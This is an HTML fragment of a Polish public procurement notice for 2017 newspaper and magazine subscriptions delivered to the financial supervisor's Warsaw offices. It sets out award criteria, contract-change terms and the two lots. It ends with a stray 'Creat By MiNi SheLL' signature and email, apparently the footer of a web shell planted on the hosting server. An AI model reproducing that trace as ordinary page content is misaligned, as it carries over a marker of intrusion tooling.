              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>a)	Cena ofertowa brutto z uwzględnieniem rabatów </td><td>60</td></tr><tr><td>b)	Termin dostawy do lokalizacji Plac Powstańców Warszawy 1 </td><td>25</td></tr><tr><td>c)	Termin dostawy do pozostałych lokalizacji (przy ul. Jasnej 12, ul. Niedźwiedzia 6 e) </td><td>15</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1.	Zgodnie z art. 144 ust. 1 Ustawy Zamawiający przewiduje zmiany postanowień zawartej Umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, w wypadku wystąpienia jednej z następujących okoliczności:
a)	w przypadku zmiany stanu prawnego, która ma wpływ na treść zawartej Umowy,
b)	w przypadku zmiany kwoty podatku VAT i kwoty wynagrodzenia brutto, które spowodowane są zmianą urzędowej stawki podatku VAT, 
c)	w przypadku skorzystania przez Zamawiającego z uprawnienia o którym mowa w §1 ust. 4 zakres zamówienia może być pomniejszony do 30% wartości Umowy.
2.	Nie stanowią zmiany Umowy w rozumieniu art. 144 ust. 1 Ustawy następujące zmiany:
a)	danych teleadresowych,
b)	osób wskazanych do kontaktów,
c)	danych rejestrowych,
d)	będące następstwem sukcesji uniwersalnej po jednej ze stron Umowy.
3. O ile Umowa nie stanowi inaczej, wszelkie jej zamiany wymagają formy pisemnej 
w postaci aneksu, pod rygorem nieważności. 

<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 24/02/2017, godzina: 09:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              PL<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br />Nie dotyczy</div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Dzienniki, tygodniki, dwutygodniki  oraz dostępy on-line - prasa krajowa.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotem zamówienia jest sukcesywna dostawa na potrzeby Urzędu Komisji Nadzoru Finansowego prasy i czasopism w prenumeracie na 2017 rok dla części I: Dzienniki, tygodniki, dwutygodniki  oraz dostępy on-line - prasa krajowa oraz części II: Prasa zagraniczna oraz dostępy online do prasy zagranicznej , którą Wykonawca zobowiązuje się sprzedawać i dostarczać Zamawiającemu do siedzib w Warszawie przez okres obowiązywania Umowy. Poprzez dostawę Zamawiający rozumie dostarczanie dzienników, tygodników, miesięczników, czasopism, magazynów oraz innych wydawnictw periodycznych, zwanych dalej prasą w wersji papierowej oraz 
w wersji elektronicznej, zgodnie z wykazem tytułów w Formularzu cenowym  dla części I: Dzienniki, tygodniki, dwutygodniki  oraz dostępy on-line -prasa krajowa, części II: Prasa zagraniczna oraz dostępy online do prasy zagranicznej, stanowiącym Załączniki nr 2 - 3 do SIWZ oraz w Projekcie Umowy dla części I/II stanowiącego Załącznik nr 4 do SIWZ.

W ramach wykonania zamówienia Wykonawca/cy będzie/dą systematycznie dostarczał/li prasę codzienną oraz tytuły będące periodykami do siedzib Zamawiającego: 
	Plac Powstańców Warszawy 1, recepcja, Warszawa
	ul. Niedźwiedzia 6 e, recepcja, Warszawa
	ul. Jasna 12, recepcja, Warszawa.

Prasa będzie dostarczana w  pakietach w dniu jej wydania. Zamawiający wymaga, aby pakiety były dostarczane w następujących godzinach: 
- do godziny 6:00 w lokalizacji Plac Powstańców Warszawy 1,
- do godziny 7:30 w pozostałych lokalizacjach w Warszawie.

Zamawiający zastrzega sobie możliwość dokonywania zmian ilościowych zamawianej prasy w zakresie poszczególnych pozycji tzn. będzie uprawniony 
do zamawiania niektórych tytułów prasowych w większej ilości egzemplarzy, aniżeli będzie to wynikało z przedmiotu umowy, a niektórych tytułów prasowych w mniejszej ilości egzemplarzy, przy zachowaniu wynagrodzenia.

Zamawiający w trakcie trwania umowy zastrzega sobie prawo do rezygnacji 
z niektórych tytułów prasowych lub zmniejszenia liczby zamawianych egzemplarzy poszczególnych tytułów a Wykonawcy nie będą przysługiwać żadne roszczenia z tego tytułu. Zakres zamówienia może zostać pomniejszony do 30% wartości umowy zawartej z wybranym Wykonawcą. 

Szczegółowy opis przedmiotu zamówienia oraz szczegółowe warunki 
i zasady realizacji zamówienia określone są w Projekcie Umowy, stanowiącym Załącznik nr 5 do SIWZ. 

UWAGA: 
Ofertę należy złożyć na wszystkie pozycje wymienione w wykazie tytułów objętych dostawą  w przeciwnym wypadku tj. pominięcia którejkolwiek 
z pozycji wymienionych w formularzu ofertowym tabeli, zaoferowanie wartości 0,00 zł lub wpisanie gratis oferta zostanie odrzucona.

<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>22200000-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  81171.28<br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 10<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>a)	Cena ofertowa brutto z uwzględnieniem rabatów </td><td>60</td></tr><tr><td>b)	Termin dostawy do lokalizacji Plac Powstańców Warszawy 1</td><td>25</td></tr><tr><td>c)	Termin dostawy do pozostałych lokalizacji (przy  ul. Jasnej 12, ul. Niedźwiedzia 6 e)</td><td>15</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>Nie dotyczy<br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Prasa zagraniczna oraz dostępy on-line do prasy zagranicznej<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotem zamówienia jest sukcesywna dostawa na potrzeby Urzędu Komisji Nadzoru Finansowego prasy i czasopism w prenumeracie na 2017 rok dla części I: Dzienniki, tygodniki, dwutygodniki  oraz dostępy on-line - prasa krajowa oraz części II: Prasa zagraniczna oraz dostępy online do prasy zagranicznej , którą Wykonawca zobowiązuje się sprzedawać i dostarczać Zamawiającemu do siedzib w Warszawie przez okres obowiązywania Umowy. Poprzez dostawę Zamawiający rozumie dostarczanie dzienników, tygodników, miesięczników, czasopism, magazynów oraz innych wydawnictw periodycznych, zwanych dalej prasą w wersji papierowej oraz 
w wersji elektronicznej, zgodnie z wykazem tytułów w Formularzu cenowym  dla części I: Dzienniki, tygodniki, dwutygodniki  oraz dostępy on-line -prasa krajowa, części II: Prasa zagraniczna oraz dostępy online do prasy zagranicznej, stanowiącym Załączniki nr 2 - 3 do SIWZ oraz w Projekcie Umowy dla części I/II stanowiącego Załącznik nr 4 do SIWZ.

W ramach wykonania zamówienia Wykonawca/cy będzie/dą systematycznie dostarczał/li prasę codzienną oraz tytuły będące periodykami do siedzib Zamawiającego: 
	Plac Powstańców Warszawy 1, recepcja, Warszawa
	ul. Niedźwiedzia 6 e, recepcja, Warszawa
	ul. Jasna 12, recepcja, Warszawa.

Prasa będzie dostarczana w  pakietach w dniu jej wydania. Zamawiający wymaga, aby pakiety były dostarczane w następujących godzinach: 
- do godziny 6:00 w lokalizacji Plac Powstańców Warszawy 1,
- do godziny 7:30 w pozostałych lokalizacjach w Warszawie.

Zamawiający zastrzega sobie możliwość dokonywania zmian ilościowych zamawianej prasy w zakresie poszczególnych pozycji tzn. będzie uprawniony 
do zamawiania niektórych tytułów prasowych w większej ilości egzemplarzy, aniżeli będzie to wynikało z przedmiotu umowy, a niektórych tytułów prasowych w mniejszej ilości egzemplarzy, przy zachowaniu wynagrodzenia.

Zamawiający w trakcie trwania umowy zastrzega sobie prawo do rezygnacji 
z niektórych tytułów prasowych lub zmniejszenia liczby zamawianych egzemplarzy poszczególnych tytułów a Wykonawcy nie będą przysługiwać żadne roszczenia z tego tytułu. Zakres zamówienia może zostać pomniejszony do 30% wartości umowy zawartej z wybranym Wykonawcą. 

Szczegółowy opis przedmiotu zamówienia oraz szczegółowe warunki 
i zasady realizacji zamówienia określone są w Projekcie Umowy, stanowiącym Załącznik nr 5 do SIWZ. 

UWAGA: 
Ofertę należy złożyć na wszystkie pozycje wymienione w wykazie tytułów objętych dostawą  w przeciwnym wypadku tj. pominięcia którejkolwiek 
z pozycji wymienionych w formularzu ofertowym tabeli, zaoferowanie wartości 0,00 zł lub wpisanie gratis oferta zostanie odrzucona.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>22200000-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  81583.57<br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 10<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>a)	Cena ofertowa brutto z uwzględnieniem rabatów</td><td>60</td></tr><tr><td>b)	Termin dostawy do lokalizacji Plac Powstańców Warszawy 1 </td><td>25</td></tr><tr><td>c)	Termin dostawy do pozostałych lokalizacji (przy ul. Jasnej 12, ul. Niedźwiedzia 6 e) </td><td>15</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com